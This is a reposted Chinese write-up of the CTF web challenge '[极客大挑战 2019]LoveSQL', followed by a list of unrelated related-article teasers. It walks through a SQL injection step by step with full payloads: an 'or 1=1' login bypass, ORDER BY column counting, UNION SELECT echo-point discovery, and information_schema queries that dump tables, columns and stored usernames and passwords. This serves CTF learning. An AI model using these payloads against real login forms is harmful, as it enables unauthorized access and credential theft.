web：[极客大挑战 2019]LoveSQL

web：[极客大挑战 2019]LoveSQL

news/2024/11/14 11:04:50/文章来源:https://blog.csdn.net/gsumall04/article/details/133418775

题目

打开页面显示如下

查看源代码，查到一个check.php，还是get传参

尝试账号密码输入

题目名为sql，用万能密码

1'or 1=1#
或
admin' or '1'='1'

给了一段乱码，也不是flag

查看字段数

/check.php?username=admin' order by 3%23&password=1

到4时报错，说明字段数为3

用union来查询测试注入点，查看回显点

构造payload

/check.php?username=1' union select 1,2,3%23&password=1

显示回显点为2和3

查看数据库

/check.php?username=1' union select 1,database(),version()%23&password=1

可得到数据库名为geek

查看数据表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

得到两个数据表

查看表中字段

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

字段都是一样的

查看表中数据

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

geekuser表中数据为

l0ve1ysq1表中数据为

查看不全，看源代码

总结

用union来查询测试注入点，查看回显点

参考文章链接：

CTF-Web-[极客大挑战 2019]LoveSQL - 知乎

LoveSQL-CSDN博客

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/144339.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

PDF文件超出上传大小？三分钟学会PDF压缩

PDF文件超出上传大小？三分钟学会PDF压缩

PDF作为一种流行的文档格式，被广泛用于各种场合，然而有时候PDF文件的大小超出了上传限制，这时候我们就需要采取一些措施来减小PDF文件的大小，下面就给大家分享几个方法，一起来学习下吧~ 方法一：嗨格式压缩大…

阅读更多...

Acer宏碁笔记本暗影骑士轻刃AN715-51原装出厂Windows10系统工厂模式镜像

Acer宏碁笔记本暗影骑士轻刃AN715-51原装出厂Windows10系统工厂模式镜像

系统自带所有驱动、NITROSENSE风扇键盘灯控制中心、Office办公软件、出厂主题壁纸、系统属性Acer宏基专属的LOGO标志、 Acer Care Center、Quick Access等预装程序下载链接：https://pan.baidu.com/s/1FDCP5EONlk0o12CYFXbhrg?pwdvazt 所需要工具：32G…

阅读更多...

uni-app 实现凸起的 tabbar 底部导航栏

uni-app 实现凸起的 tabbar 底部导航栏

效果图在 pages.json 中设置隐藏自带的 tabbar 导航栏 "custom": true, // 开启自定义tabBar(不填每次原来的tabbar在重新加载时都回闪现) 新建一个 custom-tabbar.vue 自定义组件页面 custom-tabbar.vue  <template><v…

阅读更多...

网络基础（了解网络知识的前提）

网络基础（了解网络知识的前提）

前言在正式学习网络之前，我们需要了解的一些关于计算机网络的基本知识，本文主要阐述这些基本知识，带着大家一步一步迈进互联网网络的世界； 一、局域网与广域网的概念在正式了解这些概念的前提是我们要搞懂网络出现的意义&#x…

阅读更多...

Uniapp实现APP云打包

Uniapp实现APP云打包

一. 基础配置二. APP图标配置 1. 点击浏览选取图标(注：图片格式为png) 2. 点击自动生成所有图标并替换三. 点击发行并选择云打包四. 去开发者中心获取证书我这里是已经获取好的，没有获取的话，按照提示获取即可，非常简单…

阅读更多...

Ubuntu系统Linux内核安装和使用

Ubuntu系统Linux内核安装和使用

安装： 检查树莓派Linux版本，我的是6.1 uname -r 内核下载链接： Raspberry Pi GitHub 找对应版本下载导入之后，解压安装即可 unzip linux-rpi-6.1.y.zip 其他内容 treee 指令安装 sudo apt-get install tree 使用这…

阅读更多...

【ICCV 2023 Oral】High-Quality Entity Segmentation分享

【ICCV 2023 Oral】High-Quality Entity Segmentation分享

为什么会看这篇文章呢？因为要搞所谓分割大模型，为什么要搞分割大模型，因为最终我们要搞得是，业内领先的全自动标注系统。（标完都不需要人工再修正！！！） OK，仰…

阅读更多...

JavaScript系列从入门到精通系列第十篇：JavaScript中的相等运算符与条件运算符

JavaScript系列从入门到精通系列第十篇：JavaScript中的相等运算符与条件运算符

文章目录一：相等运算符 1： 2：! 3：与! (一)： (二)：! 二：条件运算符 1：语法 2：使用 3：容易挨打的写法一：相等运算符用于比较两个值是…

阅读更多...

No151.精选前端面试题，享受每天的挑战和学习

No151.精选前端面试题，享受每天的挑战和学习

🤍 前端开发工程师（主业）、技术博主（副业）、已过CET6 🍨 阿珊和她的猫_CSDN个人主页 🕠 牛客高级专题作者、在牛客打造高质量专栏《前端面试必备》 🍚 蓝桥云课签约作者、已在蓝桥云课上架的前后端实战课程《Vue.js 和 Egg.js 开发企业级健康管理项目》、《带你从入…

阅读更多...

51单片机音乐闹钟秒表倒计时整点报时多功能电子钟万年历数码管显示( proteus仿真+程序+原理图+报告+讲解视频）

51单片机音乐闹钟秒表倒计时整点报时多功能电子钟万年历数码管显示( proteus仿真+程序+原理图+报告+讲解视频）

51单片机音乐闹钟秒表倒计时整点报时多功能电子钟万年历数码管显示( proteus仿真程序原理图报告讲解视频） 讲解视频1.主要功能：2.仿真3. 程序代码4.原理图5. 设计报告6. 设计资料内容清单 51单片机音乐闹钟秒表倒计时整点报时多功能电子钟万年历数码管显…

阅读更多...

最新AI智能写作系统ChatGPT源码/支持GPT4.0+GPT联网提问/支持ai绘画Midjourney+Prompt+MJ以图生图+思维导图生成

最新AI智能写作系统ChatGPT源码/支持GPT4.0+GPT联网提问/支持ai绘画Midjourney+Prompt+MJ以图生图+思维导图生成

一、AI创作系统 SparkAi系统是基于很火的GPT提问进行开发的Ai智能问答系统。本期针对源码系统整体测试下来非常完美，可以说SparkAi是目前国内一款的ChatGPT对接OpenAI软件系统。那么如何搭建部署AI创作ChatGPT系统？小编这里写一个详细图文教程吧&#x…

阅读更多...

多维时序 | MATLAB实现PSO-BP多变量时间序列预测(粒子群优化BP神经网络)

多维时序 | MATLAB实现PSO-BP多变量时间序列预测(粒子群优化BP神经网络)

多维时序 | MATLAB实现PSO-BP多变量时间序列预测(粒子群优化BP神经网络) 目录多维时序 | MATLAB实现PSO-BP多变量时间序列预测(粒子群优化BP神经网络)效果一览基本介绍程序设计参考资料效果一览基本介绍 1.Matlab实现PSO-BP粒子群优化BP神经网络多变量时间序列预测&#xff…

阅读更多...

《YOLOv5：从入门到实战》报错解决专栏答疑

《YOLOv5：从入门到实战》报错解决专栏答疑

前言：Hello大家好，我是小哥谈。《YOLOv5：从入门到实战》专栏上线后，部分同学在学习过程中提出了一些问题，笔者相信这些问题其他同学也有可能遇到。为了让大家可以更好地学习本专栏内容，笔者特意推出了该篇专…

阅读更多...

QT6.5.2编译PostgreSql驱动

QT6.5.2编译PostgreSql驱动

一、环境 1、操作系统：win11 2、qt版本：6.5.2 3、PostgreSql版本:14.9 二、下载qbase源码 1、下载地址：https://github.com/qt/qtbase/tree/6.5.2 将下载的源码文件解压指定的的目录，找到src/plugins/sqldrivers根据自己的实…

阅读更多...

2023年【安徽省安全员C证】模拟考试题及安徽省安全员C证实操考试视频

2023年【安徽省安全员C证】模拟考试题及安徽省安全员C证实操考试视频

题库来源：安全生产模拟考试一点通公众号小程序 2023年【安徽省安全员C证】模拟考试题及安徽省安全员C证实操考试视频，包含安徽省安全员C证模拟考试题答案和解析及安徽省安全员C证实操考试视频练习。安全生产模拟考试一点通结合国家安徽省安全员C证考试最…

阅读更多...

Three.js加载360全景图片/视频

Three.js加载360全景图片/视频

Three.js加载360全景图片/视频效果原理将全景图片/视频作为texture引入到three.js场景中将贴图与球形网格模型融合，将球模型当做成环境容器使用处理视频时需要以dom为载体，加载与控制视频动作每次渲染时更新当前texture，以达到视频播放效…

阅读更多...

Jenkins 权限管理

Jenkins 权限管理

关于Role-based Authorization Strategy 使用Jenkins自身的权限管理过于粗糙，无法对单个、一类项目做管理，我们可以使用 Role-based Authorization Strategy插件来管理项目、角色。首先安装该插件：在Jenkins查看该插件有无安装在Jenkins-…

阅读更多...

基于css变量轻松实现网站的主题切换功能

基于css变量轻松实现网站的主题切换功能

我们经常看到一些网站都有主题切换，例如vue官方文档。那他是怎么实现的呢？ 检查元素，发现点击切换时，html元素会动态的添加和移除一个class:dark，然后页面主题色就变了。仔细想想，这要是放在以前&#xff0…

阅读更多...

[ruby on rails] postgres sql explain 优化

[ruby on rails] postgres sql explain 优化

一、查看执行计划 sql User.all.to_sql # 不会实际执行查询 puts ActiveRecord::Base.connection.explain(sql)# 会实际执行查询，再列出计划 User.all.explain# 会实际执行查询，再列出计划 ActiveRecord::Base.connection.execute(EXPLAIN (ANALYZE, V…

阅读更多...

ToDoList使用自定义事件传值

ToDoList使用自定义事件传值

MyTop与MyFooter与App之间传递数据涉及到的就是子给父传递数据，MyList和MyItem与App涉及到爷孙传递数据。之前的MyTop是使用props接收App传值，然后再在methods里面调用，现在使用自定义事件来处理子组件和父组件之间传递数据。图是之前的…

阅读更多...

最新文章

推荐文章